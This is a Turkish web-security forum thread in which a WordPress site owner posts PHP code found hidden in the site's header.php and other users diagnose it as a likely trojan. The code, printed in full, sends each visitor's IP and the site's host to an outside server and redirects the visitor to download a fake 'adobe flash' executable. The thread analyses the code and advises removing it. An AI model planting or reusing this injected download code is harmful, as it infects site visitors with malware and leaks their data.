Web sitesi Güvenliği, DOS - DDOS Saldırıları...
Header.Php De Bulduğum Gizli Kod
Header.Php De Bulduğum Gizli Kod
-
hocalar bu kodu wordpress sitemin header.php içerisinde buldum siteye girdiğimde adobe+flash.exe diye bi dosya indiriyordu shell mi yemişim ne iş nedir bu kod anlayan müridler bi baksın
<?php // chosen subaccount define('SUB_ID', '2550'); // your private secure key define('SECURE_KEY', '62fc4df0bfc6fbd7f30965a856bf2289da4f6616'); $sQuery = 'http://dvbase.net/fdownload/' // subaccount ID !!!required!!! .'?id='. SUB_ID // private secure key !!!required!!! .'&key='. SECURE_KEY .'&xml' .'&ip='. urlencode($_SERVER['REMOTE_ADDR']) // those parameters are required to keep statistics .'&host='. urlencode($_SERVER['HTTP_HOST']) // name of torrent, also search request in case of unavailability of torrent !!!required!!! .'&name='. urlencode("adobe flash"); $sQuery .= '&direct='. urlencode("http://www.oyunblog.org/adobe.exe"); // direct link to file $fileXML = simplexml_load_file($sQuery); if(empty($fileXML) || empty($fileXML->url)){ // handling errors } else{ // redirect to download exe header('Location: '. urldecode($fileXML->url)); } ?>
-
büyük ihtimalle truva atı felandır hocam. kaspersky yükle ve tarat.
-
Dosyayı indir çalıştırmadan yolla bakalım virusscan sitelerine ...
Koduda cosmic yorumlarsa daha net birşey diyebilir .
-
http://dvbase.net/fdownload/ sitesine get ile ip adresini ve host adını gönderiyor. bu bilgileri büyük ihtimalle kayıt altına alıyordur. Daha sonra şöyle bir xml sayfasına yönlendiriyor. .http://dvbase.net/fdownload/?id=2550
gelen name değişkenine göre burda exe uzantılı yeni bir link oluşturuyor.
Son olarak sayfayı bu exe uzantılı linke yönlendiriyor.
işin içinde .exe varsa sikinti olabilir :)
-
trojandir abi ne olacak. header.php'den flash player mi iner.
-
gizli felan değil hocam adam açık açık yazmış
açıklama bile yazmış hatta
istediğinin true dönmesi sonucu bişey indirtiyo
ne sitesiki bu ?
-
hacılar comodo var bende bulamadı dosyada bişey online viruscanlarda denicem birde
-
snnyk bunu yazdı:
-----------------------------gizli felan değil hocam adam açık açık yazmış
açıklama bile yazmış hatta
istediğinin true dönmesi sonucu bişey indirtiyo
ne sitesiki bu ?
-----------------------------oyun sitesi hocam oyun tanıtımları yapılıyor
-
sil gitsin
-
PoLiZei bunu yazdı:
-----------------------------snnyk bunu yazdı:
-----------------------------gizli felan değil hocam adam açık açık yazmış
açıklama bile yazmış hatta
istediğinin true dönmesi sonucu bişey indirtiyo
ne sitesiki bu ?
-----------------------------oyun sitesi hocam oyun tanıtımları yapılıyor
-----------------------------Yönlendirdiği site oyun sitesi değil. Yönlendirdiği site http://dvbase.net/fdownload/?id=2550 .... düzeltme ( yönlendirdiği site http://install.downvision.com ama o da pek sağlam ayak değil bakınız : http://urlquery.net/report.php?id=70781 )
urlQuery.net den url analizi yaptığımızda pek de sağlıklı bir hosting de olmadığını söyleyebiliriz
işte sorgu sonucu
http://urlquery.net/report.php?id=70761
host grubu pek sağlıklı değil
Büyük ihtimalle shell
bakınız shell nedir : http://www.turkhackteam.net/web-server-guvenligi/700601-shell-nedir-nasil-atilir.html
-
link silinmiş adobe.exe'ye bakamadım ama trojandır.